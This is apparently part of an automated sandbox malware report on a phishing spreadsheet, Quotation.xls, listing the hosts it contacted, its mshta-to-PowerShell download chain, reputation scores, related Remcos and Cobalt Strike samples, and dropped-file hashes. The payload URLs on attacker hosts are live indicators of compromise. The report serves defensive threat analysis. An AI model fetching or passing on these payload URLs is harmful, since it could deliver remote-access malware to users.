            http://91.92.245.100/xampp/ebcd/eb/gdfvr.htax5%VirustotalBrowse
            http://107.173.143.46/T2507F/csrss.exe0%Avira URL Cloudsafe
            http://tny.wtf/jjJsPXdO0%Avira URL Cloudsafe
            https://aka.ms/nativeaot-compatibility0%Avira URL Cloudsafe
            http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%VirustotalBrowse
            unifrieghtmovers.com0%Avira URL Cloudsafe
            https://aka.ms/nativeaot-c0%VirustotalBrowse
            http://107.173.143.46/T2507F/csrss.exe13%VirustotalBrowse
            http://tny.wtf/jjJsPX00%Avira URL Cloudsafe
            https://aka.ms/nativeaot-compatibility0%VirustotalBrowse
            http://91.92.245.100/xampp/ebcd/eb/gdfvr.htahttp://91.92.245.100/xampp/ebcd/eb/gdfvr.hta00%Avira URL Cloudsafe
            http://107.173.143.46/T2507F/csr13%VirustotalBrowse
            http://crl.usertru80%Avira URL Cloudsafe
            http://tny.wtf/0%Avira URL Cloudsafe
            http://91.92.245.100/xampp/ebcd/eb/gdfvr.hta...r0%Avira URL Cloudsafe
            https://aka.ms/nativeaot-compatibilityy0%Avira URL Cloudsafe
            http://tny.wtf/jjJsPX04%VirustotalBrowse
            http://91.92.245.100/xampp/ebcd/eb/gdfvr.hta...b0%Avira URL Cloudsafe
            http://91.92.245.100/xampp/ebcd/eb/gdfvr.htahttp://91.92.245.100/xampp/ebcd/eb/gdfvr.hta0%Avira URL Cloudsafe
            http://tny.wtf/5%VirustotalBrowse
            http://91.92.245.100/xampp/ebcd/eb/gdfvr.htaoso0%Avira URL Cloudsafe
            http://91.92.245.100/xampp/ebcd/eb/gdfvr.htahttp://91.92.245.100/xampp/ebcd/eb/gdfvr.hta5%VirustotalBrowse
            http://91.92.245.100/xampp/ebcd/eb/gdfvr.hta0%Avira URL Cloudsafe
            http://91.92.245.100/xampp/ebcd/eb/gdfvr.htaic0%Avira URL Cloudsafe
            http://tny.wtf/jjJsPX0%Avira URL Cloudsafe
            http://91.92.245.100/xampp/ebcd/eb/gdfvr.htaP0%Avira URL Cloudsafe
            http://tny.wtf/jjJsPXM0%Avira URL Cloudsafe
            http://91.92.245.100/xampp/ebcd/eb/gdfvr.hta5%VirustotalBrowse
            http://tny.wtf/jjJsPX4%VirustotalBrowse
            https://aka.ms/nativeaot-compatibilityy0%VirustotalBrowse
            http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%Avira URL Cloudsafe
            http://tny.wtf/jjJsPXa0%Avira URL Cloudsafe
            http://91.92.245.100/0%Avira URL Cloudsafe
            http://tny.wtf/jjJsPXe0%Avira URL Cloudsafe
            http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%VirustotalBrowse
            http://107.173.143.46/T2507F/csrss.exem10%Avira URL Cloudsafe
            http://tny.wtf/jjJsPXa4%VirustotalBrowse
            https://aka.ms/nativeaot-compatibilityX0%Avira URL Cloudsafe
            http://91.92.245.100/xampp/ebcd/eb/gdfvr.htat0%Avira URL Cloudsafe
            http://91.92.245.100/2%VirustotalBrowse
            https://aka.ms/GlobalizationInvariantMode0%Avira URL Cloudsafe
            https://aka.ms/GlobalizationInvariantMode0%VirustotalBrowse
            http://91.92.245.100/xampp/ebcd/eb/gdfvr.htao0%Avira URL Cloudsafe
            https://aka.ms/nativeaot-compatibilityX0%VirustotalBrowse

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            geoplugin.net
            		178.237.33.50
            		truefalseunknown
            tny.wtf
            		188.114.96.3
            		truefalseunknown
            unifrieghtmovers.com
            		23.95.60.82
            		truetrue
              		unknown

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              http://107.173.143.46/T2507F/csrss.exefalse
              • 13%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              unifrieghtmovers.comtrue
              • Avira URL Cloud: safe
              		unknown
              http://91.92.245.100/xampp/ebcd/eb/gdfvr.htafalse
              • 5%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              http://tny.wtf/jjJsPXtrue
              • 4%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              http://geoplugin.net/json.gpfalse
              • URL Reputation: safe
              		unknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              http://107.173.143.46/T2507F/csrss.exeppowershell.exe, 00000007.00000002.449435147.0000000002623000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.483902193.00000000026CA000.00000004.00000800.00020000.00000000.sdmpfalse
              • 13%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              http://91.92.245.100/xampp/ebcd/eb/gdfvr.htaxmshta.exe, 00000004.00000003.424339169.00000000029ED000.00000004.00000800.00020000.00000000.sdmpfalse
              • 5%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              http://91.92.245.100/xampp/ebcd/eb/gdfvr.htaC:mshta.exe, 00000004.00000002.426650373.0000000000197000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421936825.000000000019C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.475597397.00000000002B6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.475195108.00000000002B6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.475273547.00000000002B6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.469460377.00000000002B6000.00000004.00000020.00020000.00000000.sdmpfalse
              • 5%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              http://91.92.245.100/upmshta.exe, 00000004.00000002.426650373.0000000000197000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421936825.000000000019C000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://ocsp.entrust.net03powershell.exe, 00000007.00000002.455975386.000000001C428000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.455975386.000000001C44B000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.455975386.000000001C455000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              http://107.173.143.46/T2507F/csrpowershell.exe, 00000007.00000002.449435147.0000000002623000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.483902193.00000000026CA000.00000004.00000800.00020000.00000000.sdmpfalse
              • 13%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              https://aka.ms/nativeaot-cwiniti.exefalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              http://107.173.143.46/T2507F/csrss.exewerShpowershell.exe, 00000013.00000002.489480770.000000001C2B3000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://107.173.143.46/T2507F/csrss.exed.powershell.exe, 00000007.00000002.455975386.000000001C3C0000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://contoso.com/Licensepowershell.exe, 00000007.00000002.453446463.0000000012451000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0powershell.exe, 00000007.00000002.455975386.000000001C440000.00000004.00000020.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              http://www.diginotar.nl/cps/pkioverheid0powershell.exe, 00000007.00000002.455975386.000000001C440000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.455975386.000000001C455000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              http://go.microspowershell.exe, 00000007.00000002.449435147.00000000039AC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.449435147.0000000002BDD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.483902193.00000000026CA000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://geoplugin.net/json.gp/Cwiniti.exe, 0000000B.00000002.451807346.0000000143D64000.00000004.00001000.00020000.00000000.sdmp, winiti.exe, 00000016.00000002.484524464.0000000143564000.00000004.00001000.00020000.00000000.sdmp, AddInProcess32.exe, 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              http://tny.wtf/jjJsPXdOmshta.exe, 00000004.00000002.426650373.000000000012A000.00000004.00000020.00020000.00000000.sdmptrue
              • Avira URL Cloud: safe
              		unknown
              https://aka.ms/nativeaot-compatibilitywiniti.exefalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              https://contoso.com/powershell.exe, 00000007.00000002.453446463.0000000012451000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://nuget.org/nuget.exepowershell.exe, 00000007.00000002.453446463.0000000012451000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              http://tny.wtf/jjJsPX0Quotation.xls, 37330000.0.drtrue
              • 4%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              http://91.92.245.100/xampp/ebcd/eb/gdfvr.htahttp://91.92.245.100/xampp/ebcd/eb/gdfvr.hta0mshta.exe, 00000004.00000003.424041898.00000000029E5000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://ocsp.entrust.net0Dpowershell.exe, 00000007.00000002.455975386.000000001C440000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              http://crl.usertru8powershell.exe, 00000007.00000002.455975386.000000001C455000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000007.00000002.449435147.0000000002421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.483902193.00000000023A1000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              http://tny.wtf/mshta.exe, 00000004.00000002.426650373.0000000000197000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421936825.000000000019C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.475855460.0000000003A80000.00000004.00000020.00020000.00000000.sdmptrue
              • 5%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              http://nuget.org/NuGet.exepowershell.exe, 00000007.00000002.453446463.0000000012451000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              http://91.92.245.100/xampp/ebcd/eb/gdfvr.hta...rmshta.exe, 00000004.00000003.421936825.0000000000173000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://crl.entrust.net/server1.crl0powershell.exe, 00000007.00000002.455975386.000000001C428000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.455975386.000000001C44B000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.455975386.000000001C455000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://aka.ms/nativeaot-compatibilityywiniti.exe, 0000000B.00000002.451651795.000000013FF6B000.00000002.00000001.01000000.0000000B.sdmp, winiti.exe, 0000000B.00000000.447217263.000000013FF6B000.00000002.00000001.01000000.0000000B.sdmp, winiti.exe, 0000000B.00000002.451807346.0000000143000000.00000004.00001000.00020000.00000000.sdmp, winiti.exe, 00000016.00000002.484524464.0000000142800000.00000004.00001000.00020000.00000000.sdmp, winiti.exe, 00000016.00000002.484302621.000000013F78B000.00000002.00000001.01000000.0000000B.sdmp, winiti.exe, 00000016.00000000.481803220.000000013F78B000.00000002.00000001.01000000.0000000B.sdmp, winiti.exe.7.dr, csrss[1].exe.7.drfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              https://contoso.com/Iconpowershell.exe, 00000007.00000002.453446463.0000000012451000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              http://91.92.245.100/xampp/ebcd/eb/gdfvr.hta...bmshta.exe, 00000010.00000003.469460377.00000000002B6000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://91.92.245.100/xampp/ebcd/eb/gdfvr.htahttp://91.92.245.100/xampp/ebcd/eb/gdfvr.htamshta.exe, 00000010.00000003.473435491.0000000002A65000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.474035843.0000000002A65000.00000004.00000800.00020000.00000000.sdmpfalse
              • 5%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              http://91.92.245.100/xampp/ebcd/eb/gdfvr.htaosomshta.exe, 00000004.00000002.426650373.0000000000197000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421936825.000000000019C000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://91.92.245.100/xampp/ebcd/eb/gdfvr.htaicmshta.exe, 00000010.00000002.475597397.00000000002B6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.475195108.00000000002B6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.475273547.00000000002B6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.469460377.00000000002B6000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://91.92.245.100/xampp/ebcd/eb/gdfvr.htaPmshta.exe, 00000010.00000002.475855460.0000000003A80000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://tny.wtf/jjJsPXMmshta.exe, 00000010.00000002.475597397.00000000002B6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.475195108.00000000002B6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.475273547.00000000002B6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.469460377.00000000002B6000.00000004.00000020.00020000.00000000.sdmptrue
              • Avira URL Cloud: safe
              		unknown
              http://crl.pkioverheid.nl/DomOvLatestCRL.crl0powershell.exe, 00000007.00000002.455975386.000000001C440000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.455975386.000000001C455000.00000004.00000020.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              http://tny.wtf/jjJsPXamshta.exe, 00000010.00000002.475550897.000000000022A000.00000004.00000020.00020000.00000000.sdmptrue
              • 4%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              http://91.92.245.100/mshta.exe, 00000004.00000002.426650373.0000000000197000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421936825.000000000019C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.475855460.0000000003A80000.00000004.00000020.00020000.00000000.sdmpfalse
              • 2%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              http://tny.wtf/jjJsPXemshta.exe, 00000010.00000002.475550897.000000000022A000.00000004.00000020.00020000.00000000.sdmptrue
              • Avira URL Cloud: safe
              		unknown
              http://107.173.143.46/T2507F/csrss.exem1powershell.exe, 00000013.00000002.489480770.000000001C2B3000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://aka.ms/nativeaot-compatibilityYcsrss[1].exe.7.drfalse
                		unknown
                https://aka.ms/nativeaot-compatibilityXwiniti.exe, 00000016.00000002.484293452.000000013F72B000.00000004.00000001.01000000.0000000B.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                https://aka.ms/GlobalizationInvariantModewiniti.exe, winiti.exe, 00000016.00000002.484524464.0000000142800000.00000004.00001000.00020000.00000000.sdmp, winiti.exe, 00000016.00000002.484302621.000000013F78B000.00000002.00000001.01000000.0000000B.sdmp, winiti.exe, 00000016.00000000.481803220.000000013F78B000.00000002.00000001.01000000.0000000B.sdmp, winiti.exe, 00000016.00000002.484293452.000000013F72B000.00000004.00000001.01000000.0000000B.sdmp, winiti.exe.7.dr, csrss[1].exe.7.drfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                https://secure.comodo.com/CPS0powershell.exe, 00000007.00000002.455975386.000000001C428000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.455975386.000000001C44B000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.455975386.000000001C440000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.455975386.000000001C3C0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.455975386.000000001C455000.00000004.00000020.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://91.92.245.100/xampp/ebcd/eb/gdfvr.htatmshta.exe, 00000004.00000002.426650373.0000000000173000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421936825.0000000000173000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://crl.entrust.net/2048ca.crl0powershell.exe, 00000007.00000002.455975386.000000001C440000.00000004.00000020.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://91.92.245.100/xampp/ebcd/eb/gdfvr.htaomshta.exe, 00000004.00000002.429059359.000000000338C000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown

                World Map of Contacted IPs

                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs

                Public IPs

                IPDomainCountryFlagASNASN NameMalicious
                91.92.245.100
                		unknownBulgaria
                		34368THEZONEBGfalse
                107.173.143.46
                		unknownUnited States
                		36352AS-COLOCROSSINGUSfalse
                188.114.96.3
                		tny.wtfEuropean Union
                		13335CLOUDFLARENETUSfalse
                178.237.33.50
                		geoplugin.netNetherlands
                		8455ATOM86-ASATOM86NLfalse
                23.95.60.82
                		unifrieghtmovers.comUnited States
                		36352AS-COLOCROSSINGUStrue

                General Information

                Joe Sandbox version:40.0.0 Tourmaline
                Analysis ID:1482857
                Start date and time:2024-07-26 09:28:36 +02:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 10m 19s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:defaultwindowsofficecookbook.jbs
                Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                Number of analysed new started processes analysed:28
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • GSI enabled (VBA)
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:Quotation.xls
                Detection:MAL
                Classification:mal100.phis.troj.spyw.expl.evad.winXLS@29/32@6/5
                EGA Information:
                • Successful, ratio: 66.7%
                HCA Information:Failed
                Cookbook Comments:
                • Found application associated with file extension: .xls
                • Found Word or Excel or PowerPoint or XPS Viewer
                • Attach to Office via COM
                • Active ActiveX Object
                • Active ActiveX Object
                • Scroll down
                • Close Viewer
                • Override analysis time to 63736.6357706607 for current running targets taking high CPU consumption
                • Override analysis time to 127473.271541321 for current running targets taking high CPU consumption

                Warnings

                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe, svchost.exe
                • Execution Graph export aborted for target mshta.exe, PID 3296 because there are no executed function
                • Execution Graph export aborted for target mshta.exe, PID 3828 because there are no executed function
                • Not all processes where analyzed, report is missing behavior information
                • Report size exceeded maximum capacity and may have missing behavior information.
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.
                • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                Simulations

                Behavior and APIs

                TimeTypeDescription
                03:29:56API Interceptor74x Sleep call for process: mshta.exe modified
                03:30:00API Interceptor159x Sleep call for process: powershell.exe modified
                03:30:14API Interceptor3904387x Sleep call for process: InstallUtil.exe modified

                LLM Input / Output

                InputOutput
                URL: Office document Model: gpt-4o
                ```json
{
  "riskscore": 9,
  "reasons": "The screenshot contains a visually prominent Microsoft Office logo and text stating 'This document is protected,' which can mislead users into thinking it is a legitimate document. The instructions provided create a sense of urgency by stating 'Open the document in Microsoft Office' and 'If this document was downloaded from your email, please click Enable Editing from the yellow bar above.' This language is designed to prompt immediate action. The use of a well-known brand (Microsoft Office) adds to the credibility of the document, increasing the likelihood of users following the instructions without suspicion. The sense of urgency is directly connected to the prominent instructions, making it highly likely that the document is designed to deceive users into enabling potentially harmful content."
}

                Joe Sandbox View / Context

                IPs

                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                91.92.245.100MV ENISHI V.53Y.xlsGet hashmaliciousUnknownBrowse
                • 91.92.245.100/W1007T/csrss.exe
                107.173.143.46Quotation.xlsGet hashmaliciousRemcosBrowse
                • 107.173.143.46/T2307W/csrss.exe
                Quotation.xlsGet hashmaliciousRemcosBrowse
                • 107.173.143.46/T1607W/csrss.exe
                gdfvr.htaGet hashmaliciousCobalt StrikeBrowse
                • 107.173.143.46/M1507T/csrss.exe
                Quotation.xlsGet hashmaliciousUnknownBrowse
                • 107.173.143.46/M1507T/csrss.exe
                188.114.96.3xptRc4P9NV.exeGet hashmaliciousUnknownBrowse
                • api.keyunet.cn/v3/Project/appInfo/65fc6006
                LisectAVT_2403002B_448.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                • www.universitetrading.com/hfhf/?6lBX5p6=0/2bsV2tZWehMRII3oIkv/ztWj8eLfm1RPHJ5DhA9wGKWMCN0u1aqYIHkCdH1AqUUdYe&Kjsl=FbuD_t_HwtJdin
                LisectAVT_2403002B_89.exeGet hashmaliciousCobaltStrikeBrowse
                • cccc.yiuyiu.xyz/config.ini
                54.xlsGet hashmaliciousFormBookBrowse
                • tny.wtf/
                Order_490104.xlsGet hashmaliciousUnknownBrowse
                • tny.wtf/vb
                Order_490104.xlsGet hashmaliciousUnknownBrowse
                • tny.wtf/vb
                Scan copy.xlsGet hashmaliciousUnknownBrowse
                • tny.wtf/3VC
                Order_490104.xlsGet hashmaliciousUnknownBrowse
                • tny.wtf/vb
                SEL1685129 AMANOS.pdf.exeGet hashmaliciousAzorult, GuLoaderBrowse
                • bshd1.shop/OP341/index.php
                S0042328241130.xlsGet hashmaliciousRemcosBrowse
                • tny.wtf/v0na

                Domains

                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                tny.wtf#U00d6DEME TAVS#U0130YES#U0130.xlsGet hashmaliciousRemcosBrowse
                • 188.114.97.3
                AVISO DE PAGO.xlsGet hashmaliciousUnknownBrowse
                • 188.114.97.3
                AVISO DE PAGO.xlsGet hashmaliciousUnknownBrowse
                • 188.114.97.3
                AVISO DE PAGO.xlsGet hashmaliciousUnknownBrowse
                • 188.114.97.3
                PO S0042328241130.xlsGet hashmaliciousRemcosBrowse
                • 188.114.97.3
                Scan copy.xlsGet hashmaliciousUnknownBrowse
                • 188.114.97.3
                54.xlsGet hashmaliciousFormBookBrowse
                • 188.114.97.3
                Order_490104.xlsGet hashmaliciousUnknownBrowse
                • 188.114.96.3
                Scan copy.xlsGet hashmaliciousUnknownBrowse
                • 188.114.97.3
                Order_490104.xlsGet hashmaliciousUnknownBrowse
                • 188.114.96.3
                geoplugin.netLisectAVT_2403002A_101.exeGet hashmaliciousRemcosBrowse
                • 178.237.33.50
                LisectAVT_2403002A_407.exeGet hashmaliciousRemcosBrowse
                • 178.237.33.50
                LisectAVT_2403002A_431.exeGet hashmaliciousRemcosBrowse
                • 178.237.33.50
                IAENMAIL-A4-240717-0830-000090912_PDF.exeGet hashmaliciousRemcosBrowse
                • 178.237.33.50
                CDG__ Copia de Pagamento.pdf.exeGet hashmaliciousRemcosBrowse
                • 178.237.33.50
                CFS-0682-2-08 Order.exeGet hashmaliciousRemcosBrowse
                • 178.237.33.50
                Scan_SKMBT_EPDA _ SOA_Payment Reference TR-37827392-2024-07-24.Pdf.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                • 178.237.33.50
                remcos.exeGet hashmaliciousRemcosBrowse
                • 178.237.33.50
                ogetback.docGet hashmaliciousRemcosBrowse
                • 178.237.33.50
                S0042328241130.xlsGet hashmaliciousRemcosBrowse
                • 178.237.33.50

                ASNs

                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                THEZONEBGLisectAVT_2403002A_62.exeGet hashmaliciousRedLineBrowse
                • 91.92.248.117
                LisectAVT_2403002A_97.exeGet hashmaliciousDarkVision RatBrowse
                • 91.92.244.17
                67#U2464.htaGet hashmaliciousUnknownBrowse
                • 91.92.244.191
                LisectAVT_2403002B_73.exeGet hashmaliciousXmrigBrowse
                • 91.92.248.9
                IJ8PamwVuJ.exeGet hashmaliciousXmrigBrowse
                • 91.92.248.9
                https://ffb-bk.com?id=0119818877107560047Get hashmaliciousUnknownBrowse
                • 91.92.251.205
                cLPbKg0oEK.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                • 91.92.244.238
                July17_Payment43TR_D0812_U48927_H09824_W3892_K5087_F5902_DU8927_R491.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                • 91.92.255.36
                JCrqNf4UY3.elfGet hashmaliciousGafgytBrowse
                • 91.92.255.190
                A4ZSgdgW5Z.elfGet hashmaliciousGafgytBrowse
                • 91.92.255.190
                AS-COLOCROSSINGUS#U00d6DEME TAVS#U0130YES#U0130.xlsGet hashmaliciousRemcosBrowse
                • 198.46.176.133
                BilseMHALF.rtfGet hashmaliciousUnknownBrowse
                • 172.245.123.11
                2FBexXRCHR.rtfGet hashmaliciousAgentTeslaBrowse
                • 198.46.174.139
                DBytisGNuD.exeGet hashmaliciousCobaltStrike, MetasploitBrowse
                • 107.174.69.116
                LisectAVT_2403002A_101.exeGet hashmaliciousRemcosBrowse
                • 107.175.229.139
                LisectAVT_2403002A_111.exeGet hashmaliciousTrickbotBrowse
                • 108.174.60.238
                042240724.xlsGet hashmaliciousRemcosBrowse
                • 198.46.176.133
                LisectAVT_2403002A_407.exeGet hashmaliciousRemcosBrowse
                • 107.175.229.139
                LisectAVT_2403002A_431.exeGet hashmaliciousRemcosBrowse
                • 107.175.229.139
                createdgoodthingswtihmewhilealot.gif.vbsGet hashmaliciousUnknownBrowse
                • 198.46.176.133
                CLOUDFLARENETUSinvoice.docx.docGet hashmaliciousFormBookBrowse
                • 188.114.96.3
                zKXXNr7f2e.exeGet hashmaliciousBabadedaBrowse
                • 172.64.41.3
                https://cloudflare-ipfs.com/ipfs/QmZe2ELun5aFwHyi9wE3DpfuUQM8RqExLq66jv64aV8BQd/#info@royaletruckservices.com.auGet hashmaliciousHTMLPhisherBrowse
                • 104.17.64.14
                new order 00041221.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                • 188.114.97.3
                JGKjBsQrMc.exeGet hashmaliciousAmadey, Babadeda, RedLine, Stealc, VidarBrowse
                • 172.64.41.3
                zKXXNr7f2e.exeGet hashmaliciousBabadedaBrowse
                • 162.159.61.3
                N#U00b0025498563-.pdfGet hashmaliciousUnknownBrowse
                • 172.64.41.3
                #U00d6DEME TAVS#U0130YES#U0130.xlsGet hashmaliciousRemcosBrowse
                • 188.114.97.3
                6Vm1Ii4ASz.exeGet hashmaliciousBabadedaBrowse
                • 172.64.41.3
                ynhHNexysa.exeGet hashmaliciousAgentTeslaBrowse
                • 172.67.74.152

                JA3 Fingerprints

                No context

                Dropped Files

                No context

                Created / dropped Files

                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                Download File
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:data
                Category:dropped
                Size (bytes):15189
                Entropy (8bit):5.0343247648743
                Encrypted:false
                SSDEEP:384:nWraVoGIpN6KQkj2Lkjh4iUxTnaVjvCnS/OdBmRWDf:nW+V3IpNBQkj2Oh4iUxDaVjvCnS/OdBD
                MD5:7BC3FB6565E144A52C5F44408D5D80DF
                SHA1:C3C443BF9F29EAA84B0A580FD5469F4C5CC57F77
                SHA-256:EF6A75C051D70322EDCD5A89E6398CC00E3D860E87A0C7981310D30837CBA495
                SHA-512:D0A936BAF2277884518EDF4729F88DA74C7BAA5BBB58C1060CE66DE92A23694EA993CA69D8820816C5D28182E9A38EE59DE821EE3A73F0D85DBBC74D406285A5
                Malicious:false
                Preview:PSMODULECACHE.....8.......S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script..........V.7...?...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ISE\ISE.psd1........Import-IseSnippet........Get-IseSnippet........New-IseSnippet.........._.7...[...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\PSWorkflowUtility\

                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                Download File
